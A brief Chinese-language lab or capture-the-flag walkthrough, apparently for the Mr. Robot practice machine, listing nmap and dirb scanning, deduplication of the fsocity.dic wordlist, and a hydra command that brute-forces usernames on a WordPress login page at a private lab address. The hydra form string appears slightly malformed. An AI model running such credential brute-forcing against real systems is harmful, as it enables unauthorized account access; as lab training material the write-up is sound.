第一步:nmap与dirb
fsocity.dic这个可能是用户或者密码的字典,发现内部存在大量重复数据
cat fsocity.dic | sort | uniq > fsocietyuniq
进入登录界面test/test登录
第二步:使用hydra进行用户名密码暴力破解
Invalid username 不存在该用户名 F=不存在这个的
hydra -L fsocietyuniq -p test 192.168.107.146 http-post-form '/wp-login.php:log=^USER^&PASS^&wp-submit=Log+In:F=Invalid username'